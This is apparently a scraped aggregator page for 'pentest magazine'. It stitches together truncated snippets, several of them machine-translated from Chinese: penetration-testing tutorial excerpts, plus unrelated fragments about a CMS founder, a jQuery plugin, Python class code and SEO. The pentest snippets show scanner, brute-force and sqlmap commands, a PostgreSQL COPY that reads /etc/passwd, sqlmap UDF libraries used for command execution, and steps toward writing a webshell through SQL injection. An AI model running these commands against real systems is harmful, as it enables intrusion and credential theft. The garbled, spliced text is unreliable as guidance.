pentest magazine

An nginx egg DAY has been generated in recent days. Some people always ask how to judge the Web server, and ask the scanner that has a sudden menstruation. Such as nmap nc nikto .... What should we do with so many scanners? NMAP is enough! Method N: a few more examples! Nmap Pentest @ yinyin :~ $ Nmap-sV-p 80 www.xxoo.com Starting Nmap 5.00 (http://nmap.org) at 2010-05-24 CSTInteresting ports on 203. xxx. xxx.1 × 1:PORT STATE SERVICE VERSION80/tcp ope

Injection–blind SQL INJECTION–LFI–RFI–XSS–CSRF and so on.We will use Nikto to collect vulnerability information:[Email protected]:/pentest/web/nikto# perl nikto.pl-h hack-test.comWe will also use the W3AF tool in backtrack 5 R1:[Email protected]:/pentest/web/w3af#./w3af_guiWe enter the address of the website to be detected and select the Complete security audit option.Wait a moment, and you'll see the resu

From accidentally climbing the blog It hurts. as you write your hand, medusa is still quick to crack. First, let's take a look at the help. Root @ perl-exploit:/pentest/exploits/framework3 # medusaMedusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks ALERT: Host information must be supplied. Syntax: medusa [-h host |-H file] [-u username |-U file] [-p password |-P file] [-C file]-M module [OPT]-H [TEXT]: Target hostname or IP address-H [FI

1. Read files through copyMickey @ pentest :~ /Pentest/crack/mdcrack $ psql-h 127.0.0.1-U postgresUser's postgres password:Psql (8.4.2)SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)Type "help" for help.S = # create table file (line text );CREATE TABLEPostgres = # copy file from "/etc/passwd" with delimiter ":";ERROR: extra data after last expected columnBackground: COPY file, line 1: "root: x: 0: 0:

version of the corresponding operating system root@bt:/pentest/database/sqlmap/udf/mysql# LS linux windows root@bt:/pentest/database/sqlmap/udf/mysql/ linux# ls root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls lib_mysqludf_sys.so 3, using the UDF library file to load functions and execute commandsFirst you get the hexadecimal format of the U

only need to find the version of the corresponding operating system in sqlmap. root@bt:/pentest/database/sqlmap/udf/mysql# lslinux windowsroot@bt:/pentest/database/sqlmap/udf/mysql/linux# ls32 64root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# lslib_mysqludf_sys.so 3. Use the udf library file to load the function and execute the command. First, you must ob

Running the file service receive service on an external network machine[emailprotected]:~/pentest-script/FileTransfer/HttpServer# python3 SimpleHttpUpload.py Serving HTTP on 0.0.0.0 port 8000 ...(True, "File ‘/root/pentest-script/FileTransfer/HttpServer/mo.zip‘ upload success!", ‘by: ‘, (‘127.0.0.1‘, 41170))127.0.0.1 - - [09/Mar/2018 08:27:55] "POST / HTTP/1.1" 200 -simplehttpupload.pyhttps://github.com/xia

Members of the network friendly, we interviewed today is the founder of the famous Dedecms it Plato, in recent years, the Dream of the CMS (DEDECMS) in China has become one of the most popular PHP CMS, and its founder it Plato is almost a well-known legend, 2002 graduated from Guangdong Maoming Institute of Chemical Department of his, from a layman to do almost the industry can not reach the height, this has to say is an internet miracle, and today's Computer

0. Introduction of toolsThe purpose of Dnsenum is to gather as much information as possible about a domain. The program currently performs the following operations:1) Get The host ' s Addresse (A record). 2) Get the Namservers (threaded). 3) Get the MX record (threaded). 4) Perform AXFR queries on nameservers and get BIND versions (threaded). 5) Get extra names and subdomains via Google scraping (google query = "Allinurl:-www site:domain"). 6) Brute force subdomains from file, can also perform r

First we find an injected station: Here I use my own environment to express; Let's not mess around.Http://localhost/pentest/sql/sql_injection_get.php?id=1Discovery is root permission, we try to write the horse directlyFirst, find the Web site's home directory:Database directory: D:\wamp\bin\mysql\mysql5.5.20\data\To judge, the server may be wampserver, httpd.conf file in d:/wamp/bin/apache/apache2.2.21/conf/httpd.confHttp://localhost/

What is jmagazine?Nowadays, the Internet is more and more widely used. e-Magazine is a very interesting thing, but most of them are reading it. Basically, they are Flash files, which are difficult to modify and slow to load. jmagazine is a plug-in that can help you complete an image and electronic magazine under JQ.Current version:Beta 0.1.3Compressed filesize:12,288 bytesAuthor:Ariesjia This is a small exa

1 __author__="Stephen Yuan"2 Import Time3 4 classPerson (object):5 """man's class"""6 def __init__(self, name):7Super (person, self).__init__()8Self.name = Name#record a person's name9Self.gun = None#The default person is no gun.TenSELF.HP = 100#the default person's blood volume is One A defAnzhuang_zidan (self, Dan_jia_temp, zi_dan_temp): - """put the bullets in the magazine .""" - Dan_jia_temp.baocun_zidan (zi_dan_temp) the -

Below is I write a website optimization plan, only for reference! Website Mall Optimization Program Clear site Positioning: Online Subscription (http://blog.dfww.com.cn) is a * * * Online book shopping mall, its role is in the internet on the magazine books, so is the E-commerce site. Goal: Through the network of the relevant magazine. Thinking: SEO is a common approach to E-commerce site, through the

Webug customs clearance of the real record1.Get injected, put it in the Sqlmap and run for a minute.First look at which database he usesSqlmap.py-u "Http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1"-D pentesterlab--tablesSqlmap.py-u "Http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1"-D pentesterlab-t Flag--columnsSqlmap.py-u "Http://192.168.244.134/pe